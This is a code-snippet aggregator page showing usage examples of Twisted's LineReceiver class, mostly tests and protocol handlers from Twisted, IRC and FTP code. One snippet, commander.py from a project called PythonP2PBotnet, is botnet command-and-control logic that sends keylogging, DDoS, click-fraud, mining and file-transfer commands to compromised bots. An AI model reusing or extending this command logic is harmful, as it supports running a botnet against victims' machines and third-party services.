python类LineReceiver()的实例源码

test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def test_rawDataError(self):
        """
        C{LineReceiver.dataReceived} forwards errors returned by
        C{rawDataReceived}.
        """
        proto = basic.LineReceiver()
        proto.rawDataReceived = lambda data: RuntimeError("oops")
        transport = proto_helpers.StringTransport()
        proto.makeConnection(transport)
        proto.setRawMode()
        why = proto.dataReceived(b'data')
        self.assertIsInstance(why, RuntimeError)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def test_rawDataReceivedNotImplemented(self):
        """
        When L{LineReceiver.rawDataReceived} is not overridden in a
        subclass, calling it raises C{NotImplementedError}.
        """
        proto = basic.LineReceiver()
        self.assertRaises(NotImplementedError, proto.rawDataReceived, 'foo')
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def test_longUnendedLine(self):
        """
        If more bytes than C{LineReceiver.MAX_LENGTH} arrive containing no line
        delimiter, all of the bytes are passed as a single string to
        L{LineReceiver.lineLengthExceeded}.
        """
        excessive = b'x' * (self.proto.MAX_LENGTH * 2 + 2)
        self.proto.dataReceived(excessive)
        self.assertEqual([excessive], self.proto.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_longLineAfterShortLine(self):
        """
        If L{LineReceiver.dataReceived} is called with bytes representing a
        short line followed by bytes that exceed the length limit without a
        line delimiter, L{LineReceiver.lineLengthExceeded} is called with all
        of the bytes following the short line's delimiter.
        """
        excessive = b'x' * (self.proto.MAX_LENGTH * 2 + 2)
        self.proto.dataReceived(b'x' + self.proto.delimiter + excessive)
        self.assertEqual([excessive], self.proto.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def test_longLineWithDelimiter(self):
        """
        If L{LineReceiver.dataReceived} is called with more than
        C{LineReceiver.MAX_LENGTH} bytes containing a line delimiter somewhere
        not in the first C{MAX_LENGTH} bytes, the entire byte string is passed
        to L{LineReceiver.lineLengthExceeded}.
        """
        excessive = self.proto.delimiter.join(
            [b'x' * (self.proto.MAX_LENGTH * 2 + 2)] * 2)
        self.proto.dataReceived(excessive)
        self.assertEqual([excessive], self.proto.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_multipleLongLines(self):
        """
        If L{LineReceiver.dataReceived} is called with more than
        C{LineReceiver.MAX_LENGTH} bytes containing multiple line delimiters
        somewhere not in the first C{MAX_LENGTH} bytes, the entire byte string
        is passed to L{LineReceiver.lineLengthExceeded}.
        """
        excessive = (
            b'x' * (self.proto.MAX_LENGTH * 2 + 2) + self.proto.delimiter) * 2
        self.proto.dataReceived(excessive)
        self.assertEqual([excessive], self.proto.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def test_maximumLineLength(self):
        """
        C{LineReceiver} disconnects the transport if it receives a line longer
        than its C{MAX_LENGTH}.
        """
        proto = basic.LineReceiver()
        transport = proto_helpers.StringTransport()
        proto.makeConnection(transport)
        proto.dataReceived(b'x' * (proto.MAX_LENGTH + 1) + b'\r\nr')
        self.assertTrue(transport.disconnecting)
sip.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def dataReceived(self, data):
        try:
            if isinstance(data, unicode):
                data = data.encode("utf-8")
            basic.LineReceiver.dataReceived(self, data)
        except:
            log.err()
            self.invalidMessage()
smtp.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def sendLine(self, line):
        # Log sendLine only if you are in debug mode for performance
        if self.debug:
            self.log.append('>>> ' + line)

        basic.LineReceiver.sendLine(self,line)
irc.py 文件源码 项目:enigma2-plugins 作者: opendreambox 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def _reallySendLine(self, line):
        return basic.LineReceiver.sendLine(self, lowQuote(line) + '\r')
irc.py 文件源码 项目:enigma2-plugins 作者: opendreambox 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def dataReceived(self, data):
        basic.LineReceiver.dataReceived(self, data.replace('\r', ''))
commander.py 文件源码 项目:PythonP2PBotnet 作者: jhoward321 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def parsecommands(self, line):
        tmp = line.split(' ')
        cmd = tmp[0].upper()
        if cmd == 'KEYLOG':
            # Iterate through bot list and send command out in mass.
            # This can be changed depending on the command
            for key, val in self.slaves.iteritems():
                output = 'Starting keylogger for bot {0}\n'.format(key)
                self.transport.write(output)
                # actually send commands out on DHT to bot.
                # Val is the bot's individual location it checks for commands
                botcmd = str(self.count) + " " + cmd
                self.kserver.set(val, botcmd)
        if cmd == 'DDOS':
            for key, val in self.slaves.iteritems():
                output = 'Starting DDOS for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'DOWNLOAD':
            for key, val in self.slaves.iteritems():
                output = 'Starting DOWNLOAD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'UPLOAD':
            for key, val in self.slaves.iteritems():
                output = 'Starting UPLOAD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)

        if cmd == 'BITCOIN':
            print("This feature isn't fully implemented, should work "
                  "but highly insecure and slow")
            for key, val in self.slaves.iteritems():
                output = 'Starting BITCOIN MINING for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'CLICKFRAUD':
            for key, val in self.slaves.iteritems():
                output = 'Starting CLICKFRAUD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)

    # this is called on the initial startup as part of the LineReceiver class
ftp.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def lineReceived(self, line):
        self.resetTimeout()
        self.pauseProducing()
        if bytes != str:
            line = line.decode(self._encoding)

        def processFailed(err):
            if err.check(FTPCmdError):
                self.sendLine(err.value.response())
            elif (err.check(TypeError) and any((
                    msg in err.value.args[0] for msg in (
                        'takes exactly', 'required positional argument')))):
                self.reply(SYNTAX_ERR, "%s requires an argument." % (cmd,))
            else:
                log.msg("Unexpected FTP error")
                log.err(err)
                self.reply(REQ_ACTN_NOT_TAKEN, "internal server error")

        def processSucceeded(result):
            if isinstance(result, tuple):
                self.reply(*result)
            elif result is not None:
                self.reply(result)

        def allDone(ignored):
            if not self.disconnected:
                self.resumeProducing()

        spaceIndex = line.find(' ')
        if spaceIndex != -1:
            cmd = line[:spaceIndex]
            args = (line[spaceIndex + 1:],)
        else:
            cmd = line
            args = ()
        d = defer.maybeDeferred(self.processCommand, cmd, *args)
        d.addCallbacks(processSucceeded, processFailed)
        d.addErrback(log.err)

        # XXX It burnsss
        # LineReceiver doesn't let you resumeProducing inside
        # lineReceived atm
        from twisted.internet import reactor
        reactor.callLater(0, d.addBoth, allDone)


问题


面经


文章

微信
公众号

扫码关注公众号